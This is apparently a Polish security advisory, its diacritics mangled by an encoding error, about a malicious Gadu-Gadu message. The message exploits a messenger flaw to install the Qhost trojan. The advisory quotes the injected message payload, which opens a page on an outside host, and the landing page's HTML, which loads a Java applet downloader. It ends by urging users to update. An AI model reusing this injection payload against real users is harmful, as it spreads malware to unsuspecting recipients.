Cztery dni temu informowali¶my o kolejnych b³êdach w komunikatorze Gadu-Gadu. Jeden z nich pozwala³ miêdzy innymi na wykonanie kodu javascript w strefie lokalnej poprzez wys³anie odpowiednio spreparowanej wiadomo¶ci. W dniu dzisiejszym w sieci Gadu-Gadu rozsy³ana jest wiadomo¶æ której odebranie powoduje instalacje trojana Qhost.
Wiadomo¶æ rozsy³ana jest z bramki WWW - GG o numerze 7021349. Oto jej tre¶æ:
www.po"style=background-image:url(javascript:window.open('http://iframedolla rs.biz/dl/adv407.php','','left=10000'));".pl
W pliku adv407.php znajduje siê kod HTML:
<html><head>
</head><body>
<textarea cd="cxw" style="display:none;" >
</textarea>
<applet width=1 height=1 ARCHIVE=loaderadv407.jar code=Counter></APPLET></body></html>
Aplet zapisany w archiwum loaderadv407.jar pobiera program
Zalecamy niezw³oczn± aktualizacje do najnowszej wersji klienta Gadu-Gadu b±d¼ skorzystanie z alternatywnych klientów.
orginal: